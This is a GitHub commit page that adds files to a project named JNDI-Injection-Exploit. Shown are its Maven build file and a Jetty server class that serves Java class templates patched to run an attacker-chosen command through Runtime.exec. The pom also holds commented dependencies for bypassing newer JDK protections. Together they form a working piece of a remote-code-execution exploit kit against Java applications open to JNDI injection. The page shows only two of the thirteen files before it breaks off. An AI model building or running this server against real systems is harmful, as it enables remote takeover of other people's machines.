-
Notifications
You must be signed in to change notification settings - Fork 726
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
13 changed files
with
1,217 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,136 @@ | ||
| <?xml version="1.0" encoding="UTF-8"?> | ||
| <project xmlns="http://maven.apache.org/POM/4.0.0" | ||
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
| <modelVersion>4.0.0</modelVersion> | ||
|
|
||
| <groupId>welk1n</groupId> | ||
| <artifactId>JNDI-Injection-Exploit</artifactId> | ||
| <version>1.0-SNAPSHOT</version> | ||
|
|
||
| <properties> | ||
| <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> | ||
| <jetty.version>8.1.9.v20130131</jetty.version> | ||
| </properties> | ||
|
|
||
|
|
||
| <dependencies> | ||
| <!-- Util --> | ||
| <dependency> | ||
| <groupId>org.ow2.asm</groupId> | ||
| <artifactId>asm</artifactId> | ||
| <version>7.1</version> | ||
| </dependency> | ||
|
|
||
| <dependency> | ||
| <groupId>org.javassist</groupId> | ||
| <artifactId>javassist</artifactId> | ||
| <version>3.19.0-GA</version> | ||
| </dependency> | ||
|
|
||
| <dependency> | ||
| <groupId>org.reflections</groupId> | ||
| <artifactId>reflections</artifactId> | ||
| <version>0.9.9</version> | ||
| </dependency> | ||
|
|
||
| <dependency> | ||
| <groupId>org.slf4j</groupId> | ||
| <artifactId>slf4j-nop</artifactId> | ||
| <version>1.7.24</version> | ||
| </dependency> | ||
|
|
||
| <dependency> | ||
| <groupId>org.apache.commons</groupId> | ||
| <artifactId>commons-lang3</artifactId> | ||
| <version>3.4</version> | ||
| </dependency> | ||
|
|
||
| <dependency> | ||
| <groupId>commons-cli</groupId> | ||
| <artifactId>commons-cli</artifactId> | ||
| <version>1.3</version> | ||
| </dependency> | ||
|
|
||
|
|
||
| <!-- For LDAP reference jndi --> | ||
| <dependency> | ||
| <groupId>com.unboundid</groupId> | ||
| <artifactId>unboundid-ldapsdk</artifactId> | ||
| <version>3.1.1</version> | ||
| </dependency> | ||
|
|
||
| <!-- Jetty --> | ||
| <dependency> | ||
| <groupId>org.eclipse.jetty.aggregate</groupId> | ||
| <artifactId>jetty-webapp</artifactId> | ||
| <version>${jetty.version}</version> | ||
| </dependency> | ||
|
|
||
| <!-- Bypass JDK 1.8.0_191+ --> | ||
| <!-- <dependency>--> | ||
| <!-- <groupId>org.apache.tomcat</groupId>--> | ||
| <!-- <artifactId>tomcat-catalina</artifactId>--> | ||
| <!-- <version>8.5.38</version>--> | ||
| <!-- </dependency>--> | ||
| <!-- <dependency>--> | ||
| <!-- <groupId>org.apache.tomcat</groupId>--> | ||
| <!-- <artifactId>tomcat-jasper-el</artifactId>--> | ||
| <!-- <version>8.5.38</version>--> | ||
| <!-- </dependency>--> | ||
| <!-- <dependency>--> | ||
| <!-- <groupId>org.codehaus.groovy</groupId>--> | ||
| <!-- <artifactId>groovy</artifactId>--> | ||
| <!-- <version>2.4.5</version>--> | ||
| <!-- </dependency>--> | ||
|
|
||
| <!-- test --> | ||
| <dependency> | ||
| <groupId>junit</groupId> | ||
| <artifactId>junit</artifactId> | ||
| <version>4.12</version> | ||
| <scope>test</scope> | ||
| </dependency> | ||
| </dependencies> | ||
|
|
||
|
|
||
| <build> | ||
| <plugins> | ||
| <plugin> | ||
| <groupId>org.apache.maven.plugins</groupId> | ||
| <artifactId>maven-compiler-plugin</artifactId> | ||
| <configuration> | ||
| <source>1.7</source> | ||
| <target>1.7</target> | ||
| </configuration> | ||
| </plugin> | ||
|
|
||
| <plugin> | ||
| <artifactId>maven-assembly-plugin</artifactId> | ||
| <version>2.5.5</version> | ||
| <configuration> | ||
| <finalName>${project.artifactId}-${project.version}-all</finalName> | ||
| <appendAssemblyId>false</appendAssemblyId> | ||
| <descriptorRefs> | ||
| <descriptorRef>jar-with-dependencies</descriptorRef> | ||
| </descriptorRefs> | ||
| <archive> | ||
| <manifest> | ||
| <mainClass>run.ServerStart</mainClass> | ||
| </manifest> | ||
| </archive> | ||
| </configuration> | ||
| <executions> | ||
| <execution> | ||
| <id>make-assembly</id> | ||
| <phase>package</phase> | ||
| <goals> | ||
| <goal>single</goal> | ||
| </goals> | ||
| </execution> | ||
| </executions> | ||
| </plugin> | ||
| </plugins> | ||
| </build> | ||
|
|
||
| </project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,113 @@ | ||
| package jetty; | ||
|
|
||
| import org.eclipse.jetty.server.Server; | ||
| import org.eclipse.jetty.servlet.ServletHandler; | ||
| import javax.servlet.ServletException; | ||
| import javax.servlet.http.HttpServlet; | ||
| import javax.servlet.http.HttpServletRequest; | ||
| import javax.servlet.http.HttpServletResponse; | ||
| import java.io.*; | ||
| import java.net.URLEncoder; | ||
|
|
||
| import static run.ServerStart.getLocalTime; | ||
| import static util.Transformers.insertCommand; | ||
|
|
||
| /** | ||
| * @Classname JettyServer | ||
| * @Description HTTPServer supply .class file which execute command by Runtime.getRuntime.exec() | ||
| * @Author welkin | ||
| */ | ||
| public class JettyServer implements Runnable{ | ||
| private int port; | ||
| private Server server; | ||
| private static String command; | ||
|
|
||
| // public JettyServer(int port) { | ||
| // this.port = port; | ||
| // server = new Server(port); | ||
| // command = "open /Applications/Calculator.app"; | ||
| // } | ||
|
|
||
| public JettyServer(int port,String cmd) { | ||
| this.port = port; | ||
| server = new Server(port); | ||
| command = cmd; | ||
| } | ||
|
|
||
| @Override | ||
| public void run() { | ||
| ServletHandler handler = new ServletHandler(); | ||
| server.setHandler(handler); | ||
|
|
||
| handler.addServletWithMapping(DownloadServlet.class, "/*"); | ||
| try { | ||
| server.start(); | ||
| server.join(); | ||
| }catch (Exception e){ | ||
| e.printStackTrace(); | ||
| } | ||
|
|
||
| } | ||
|
|
||
| @SuppressWarnings("serial") | ||
| public static class DownloadServlet extends HttpServlet { | ||
| public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ | ||
|
|
||
| String filename = request.getRequestURI().substring(1); | ||
| InputStream in = checkFilename(filename); | ||
| byte[] transformed; | ||
| ByteArrayInputStream bain = null; | ||
|
|
||
| if (in != null) { | ||
| try { | ||
| transformed = insertCommand(in,command); | ||
| bain = new ByteArrayInputStream(transformed); | ||
|
|
||
| }catch (Exception e){ | ||
| e.printStackTrace(); | ||
| System.out.println(getLocalTime() + " [JETTYSERVER]>> Byte array build failed."); | ||
| } | ||
|
|
||
| System.out.println(getLocalTime() + " [JETTYSERVER]>> Log a request to " + request.getRequestURL()); | ||
| response.setStatus(HttpServletResponse.SC_OK); | ||
| response.setHeader("content-disposition", "attachment;filename="+URLEncoder.encode(filename, "UTF-8")); | ||
|
|
||
| int len ; | ||
| byte[] buffer = new byte[1024]; | ||
| OutputStream out = response.getOutputStream(); | ||
| if (bain != null){ | ||
| while ((len = bain.read(buffer)) > 0) { | ||
| out.write(buffer,0,len); | ||
| } | ||
| bain.close(); | ||
| }else { | ||
| System.out.println(getLocalTime() + " [JETTYSERVER]>> Read file error!"); | ||
| } | ||
| }else { | ||
| System.out.println(getLocalTime() + " [JETTYSERVER]>> URL("+ request.getRequestURL() +") Not Exist!"); | ||
| } | ||
| } | ||
|
|
||
| public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ | ||
| doGet(request, response); | ||
| } | ||
| } | ||
|
|
||
| private static InputStream checkFilename(String filename){ | ||
| String template; | ||
| switch (filename){ | ||
| case "ExecTemplateJDK7.class": | ||
| template = "template/ExecTemplateJDK7.class"; | ||
| break; | ||
| case "ExecTemplateJDK8.class": | ||
| template = "template/ExecTemplateJDK8.class"; | ||
| break; | ||
| // TODO:Add more | ||
| default: | ||
| return null; | ||
| } | ||
| return Thread.currentThread().getContextClassLoader().getResourceAsStream(template); | ||
|
|
||
| } | ||
|
|
||
| } |
Oops, something went wrong.